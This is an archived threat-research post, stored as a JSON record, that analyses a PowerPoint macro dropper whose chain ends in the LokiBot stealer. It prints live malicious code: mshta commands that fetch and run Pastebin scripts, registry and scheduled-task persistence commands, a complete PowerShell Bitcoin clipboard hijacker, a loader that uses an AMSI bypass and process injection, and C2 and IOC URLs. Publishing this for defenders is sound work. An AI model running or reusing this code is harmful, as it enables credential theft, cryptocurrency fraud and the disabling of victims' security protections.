{
	"id": "30b22054-d5e5-4828-b6e8-c087c1d9c356",
	"created_at": "2026-04-06T00:18:00.540673Z",
	"updated_at": "2026-04-10T13:12:32.77972Z",
	"deleted_at": null,
	"sha1_hash": "8b2e60d80968d8c2abc3c225fe545107e9b5572e",
	"title": "A twisted malware infection chain",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 724999,
	"plain_text": "A twisted malware infection chain\r\nPublished: 2020-08-26 · Archived: 2026-04-05 21:03:11 UTC\r\nRecently, a malware dropper received by mail has caught our attention as we have detected different samples sent\r\nto multiple targets in Spain, Portugal, Italy and Norway, although it has probably reached many more European\r\ncountries.\r\nFirstly, it is characteristic that it lands on the victim in PPT format, while it has been much more common to find\r\nDOC or XLS extensions being used for this purpose.\r\nThe document has no content, but when you close the PPT viewer, the following window shows up:\r\nThis window is generated by the macros contained in the On_Close function, which is executed when you close\r\nthe document, instead of when oppened, thus preventing macros from being executed in many sandbox solutions.\r\nThis macro have the following slightly obfuscated code:\r\nNote that, before the “MsgBox”, it executes “Shell” with two concatenated variables. If we look at the content of\r\nthose two variables, we can see that they contain the following string: “mshta.exe\r\nhttps://lab52.io/blog/a-twisted-malware-infection-chain/\r\nPage 1 of 8\n\nhttps://j.]mp/kasasjdoopoopasdskdd”, which causes the legitimate Windows interpreter “mshta” to execute a script\r\nhosted on the web that follows.\r\nIn fact, this address only redirects to the following link in Pastebin: https://pastebin.com/mqRZ7CBC, which\r\ncontains the following obfuscated script:\r\nAfter cleaning up the script a bit, we can see that it triggers the execution of the following commands:\r\n‘id1\r\nrun mshta.exe “https://pastebin.com\\raw\\ZnhyvWAU”\r\nrun schtasks.exe “C:\\Windows\\System32\\schtasks.exe” /create /sc MINUTE /mo 60 /tn\r\n“xesefiliym” /tr “mshta.exe “https://pastebin.com\\raw\\ZnhyvWAU” /F\r\n‘id2\r\nrun reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\trats2di =\u003e mshta.exe\r\n“https://pastebin.com\\raw\\d7kxMSZd”\r\n‘id3\r\nrun reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ =\u003e mshta.exe\r\n“https://pastebin.com\\raw\\VJDyrCD2”\r\n‘defid\r\nrun mshta.exe “https://pastebin.com\\raw\\9dva5i24”\r\nrun reg add HKCU\\\\Software\\\\Microsoft\\\\Windows notepad\\\\CurrentVersion\\\\Run\\\\rednefed =\u003e\r\nmshta.exe “https://pastebin.com\\raw\\9dva5i24”\r\nBasically, the script consists of the execution of two other Pastebin mshta scripts, and the creation of persistence\r\nof these two, plus another two extra in the registry and in the programmed tasks of the system, causing that in each\r\nreboot, there are 4 scripts being downloaded from Pastebin and executed on the computer.\r\nThe execution of each of the 4 scripts is preceded by one of the following identifiers “id1, id2, id3 and defid“.\r\nSince the script executed by id1 is the most complex, we will leave it for the end of the post and we will focus\r\nfirst on the other 3 in order of complexity.\r\nid3 does not run anything, probably the author who is using this dropper did not need it and left it free, pointing to\r\nthe next script hosted in Pastebin:\r\n\u003cscript language=”\u0026#86;\u0026#66;\u0026#83;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;”\u003e\r\nself.close\r\nhttps://lab52.io/blog/a-twisted-malware-infection-chain/\r\nPage 2 of 8\n\n\u003c/script\u003e\r\nid2 consists of a small script in powershell, which runs on every reboot and stays in a loop checking everything\r\ncopied to the Windows clipboard. In case that the copied string is a Bitcoin address, it replaces it with the\r\nattacker’s Bitcoin address, in order to make the user deposit money into the actor’s account:\r\nfunction isBitcoinAddress([string]$clipboardContent)\r\n{\r\nif($clipboardContent[0] -ne \\'1\\')\r\n{\r\nreturn $false\r\n}\r\n$strLength = $clipboardContent.length\r\nif($strLength -lt 26 -or $strLength -gt 35)\r\n{\r\nreturn $false\r\n}\r\n$validRegex = \\'^[a-zA-Z0-9\\\\s]+$\\'\r\nif($clipboardContent -cnotmatch $validRegex)\r\n{\r\nreturn $false\r\n}\r\nreturn $true\r\n}\r\n$bitcoinAddresses = (\"19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W\",\r\n\"19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W\",lol,\r\n\"19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W\", \"19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W\",\r\n\"19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W\")\r\nhttps://lab52.io/blog/a-twisted-malware-infection-chain/\r\nPage 3 of 8\n\n$bitcoinAddressesSize = $bitcoinAddresses.length\r\n$i = 0\r\n$oldAddressSet = \"\"\r\nwhile(1)\r\n{\r\n$clipboardContent = Get-Clipboard\r\nif((isBitcoinAddress($clipboardContent)) -ceq $true -and\r\n$clipboardContent -cne $oldAddressSet)\r\n{\r\nSet-Clipboard $bitcoinAddresses[$i]\r\n$oldAddressSet = $bitcoinAddresses[$i]\r\n$i = ($i + 1) % $bitcoinAddressesSize\r\n}\r\n}\r\nIn this case, although the script is capable of storing up to four bitcoin addresses, the script only has one repeated\r\nfour times (19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W), from which has been possible to identify different\r\nsources that did not have much activity:\r\nhttps://lab52.io/blog/a-twisted-malware-infection-chain/\r\nPage 4 of 8\n\nDefid, on the other hand, points to another script, which downloads from Pastebin a base64 encoded file, which\r\nhas been inverted and where the “0” characters have been replaced by the “.” character in order to make its\r\nanalysis more difficult:\r\nAfter sorting and decoding it, we obtain a small executable developed in .Net and without obfuscation whose only\r\npurpose is to drop in the system a .vbs file that disables a large number of system security policies, including those\r\nof Windows Defender and MS Office.\r\nFinally, the script executed by id1 after being cleaned up a bit, contains the following relevant commands:\r\nCreateObject(\"Wscript.Shell\").regwrite \"HKCU\\Software\\Fucku\",\r\n\"$fucksecurityresearchers='contactmeEX'.replace('contactme','I');\r\nhttps://lab52.io/blog/a-twisted-malware-infection-chain/\r\nPage 5 of 8\n\nsal M $fucksecurityresearchers;\r\ndo {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);\r\n$KDASKDKAs = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);\r\n[System.Net.ServicePointManager]::SecurityProtocol = $KDASKDKAs;\r\n$iwannaleftsellingtools= New-Object -Com Microsoft.XMLHTTP;\r\n$iwannaleftsellingtools.open('GET','https://pastebin.com/raw/n9Zadz2P',$false);\r\n$iwannaleftsellingtools.send();\r\n$ijijinjnini=$iwannaleftsellingtools.responseText;\r\n$asciiChars= $ijijinjnini -split '-' |ForEach-Object {[char][byte]\"\"0x$_\"\"};\r\n$asciiString= $data -join ''|M;\r\n[Byte[]]$Cli2= iex(iex('(\u0026(GCM *W-O*)'+\r\n'Net.WebClient).DownloadString(''https://pastebin.com/raw/UTLkgL5Y'').replace(''/-(+)-\\'','0x')) | g;\r\n$iwannaleftsellingtools=[System.Reflection.Assembly]::Load($decompressedByteArray);\r\n[rOnAlDo]::ChRiS('notepad.exe',$Cli2)\" , \"REG_SZ\"\r\nThis script, first of all leaves some kind words for the analyst who is reviewing the execution flow of this threat,\r\nand informs us that he would like to change it’s job :). In terms of capabilities, mainly what it does is download\r\ntwo other executables developed in .Net with obfuscation techniques similar to those of the “Defid” executable.\r\nOnce downloaded and deobfuscated, it loads them with “[System.Reflection.Assembly]::Load(XXX)” which\r\nallows him to directly call functions within these binaries from PowerShell.\r\nThe call to the first binary loaded, is as follows\r\n$blind=[System.Reflection.Assembly]::Load($deblindB)\r\n[Amsi]::Bypass()\r\nThe name of the funcion and class being called gives clues of its purpose. The binary is obfuscated with\r\nConfuserEx, therefore using some tool for the analysis, such as “de4dot-cex”, can make easier to analyze its\r\ncontent.\r\nhttps://lab52.io/blog/a-twisted-malware-infection-chain/\r\nPage 6 of 8\n\nIt consists of a DLL that does what it promises, since it bypasses AMSI to avoid detection using a version\r\npractically identical to this technique “https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell”.\r\nAfter this, it downloads a third executable from Pastebin, decodes it and stores it in a variable that it calls $Cli2\r\nand loads the second executable, also in .Net, and calls its function “Chris()” passing as parameters the string\r\n“notepad.exe” and the variable that contains the third executable.\r\nThis second binary just loaded, after being analyzed in the same way as the AMSI Bypass DLL, is used to inject in\r\na non .Net executable inside another process that is not .Net either.\r\nThat is, it creates a legitimate notepad process, and injects into it the third binary it has downloaded.\r\nThis last binary, consists of a sample of the Bot/Stealer LokiBot, practically unpacked, which at this point, is in a\r\nsystem without most of its protection measures.\r\nIt is interesting that, up to this point, this campaign coincides in many points with the following report related to\r\nan AgentTesla infection campaign, but as in this case, the final threat is not developed in .Net, they have had to\r\nadd this last extra loader, in order to inject malware developed in other languages, in other processes.\r\nThe sample command and control server is “http://195.69.140.]147/.op/cr.php/Gi4uJRts3jTJM” and although its\r\nmain function is to act as a stealer, as it focuses on stealing credentials from all types of mail clients, FTP,\r\nbrowsers and many other services, it also acts as a bot, allowing some control over the computer by the actor\r\nbehind this threat.\r\nIOCs\r\nhttp://195.69.140.]147/.op/cr.php/Gi4uJRts3jTJM\r\nhttps://j.mp/kasasjdoopoopasdskdd\r\nhttps://pastebin.com/raw/ZnhyvWAU\r\nhttps://pastebin.com/raw/d7kxMSZd\r\nhttps://pastebin.com/raw/VJDyrCD2\r\nhttps://lab52.io/blog/a-twisted-malware-infection-chain/\r\nPage 7 of 8\n\nhttps://pastebin.com/raw/9dva5i24\r\nhttps://pastebin.com/raw/n9Zadz2P\r\nhttps://pastebin.com/raw/XCXpMvQC\r\nhttps://pastebin.com/raw/UTLkgL5Y\r\nSource: https://lab52.io/blog/a-twisted-malware-infection-chain/\r\nhttps://lab52.io/blog/a-twisted-malware-infection-chain/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://lab52.io/blog/a-twisted-malware-infection-chain/"
	],
	"report_names": [
		"a-twisted-malware-infection-chain"
	],
	"threat_actors": [],
	"ts_created_at": 1775434680,
	"ts_updated_at": 1775826752,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8b2e60d80968d8c2abc3c225fe545107e9b5572e.pdf",
		"text": "https://archive.orkl.eu/8b2e60d80968d8c2abc3c225fe545107e9b5572e.txt",
		"img": "https://archive.orkl.eu/8b2e60d80968d8c2abc3c225fe545107e9b5572e.jpg"
	}
}